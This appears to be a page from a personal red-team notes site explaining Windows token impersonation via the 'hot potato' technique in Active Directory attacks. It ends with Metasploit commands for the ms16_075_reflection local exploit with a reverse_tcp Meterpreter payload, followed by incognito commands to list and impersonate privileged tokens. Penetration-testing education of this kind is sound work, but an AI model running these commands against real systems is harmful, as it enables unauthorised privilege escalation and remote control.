RedTeam
5.Machine
3.Active-Directory
General
Exploitation
5.Exploiting-AD
Specific-Topics
Token Impersonation

General

Token impersonation is a technique that allows a user or process to assume the identity of another user or process in order to access resources or perform actions that would not normally be allowed. In the context of Windows operating systems, token impersonation is often used to gain access to resources or perform actions that require higher privileges.

Token impersonation with "hot potato" refers to a technique used in Windows exploitation that involves stealing an authentication token from a privileged process and using it to impersonate a user with higher privileges. This allows an attacker to perform actions that the user would not normally have the permissions to do.

To perform token impersonation with "hot potato," the attacker typically uses a vulnerability in a process that is running with higher privileges to inject code into the process. This code then steals the authentication token from the process and uses it to impersonate the user associated with the token. The attacker can then use this impersonated token to perform actions on the system that would normally require higher privileges.

It's important to note that this technique requires the attacker to already have some level of access to the system, as they need to be able to inject code into a privileged process in order to steal the authentication token. However, once they have successfully stolen the token through the "hot potato" attack, they can use it to escalate their privileges and gain further access to the system.

More info about the hot potato exploit ---> https://foxglovesecurity.com/2016/01/16/hot-potato/ (opens in a new tab)

Hot Potato ---> Manual Option Meterpreter ---> Automated Option

Commands

Those command should be run in a meterpreter session where you already have initial access to the target

# Use Exploit
use exploit/windows/local/ms16_075_reflection
set payload windows/x64/meterpreter/reverse_tcp
show options
set Session X
run

# Check Tokens 
session X
load incognito
list_tokens -u
impersonate_token "TOKEN CHOOSED"
getuid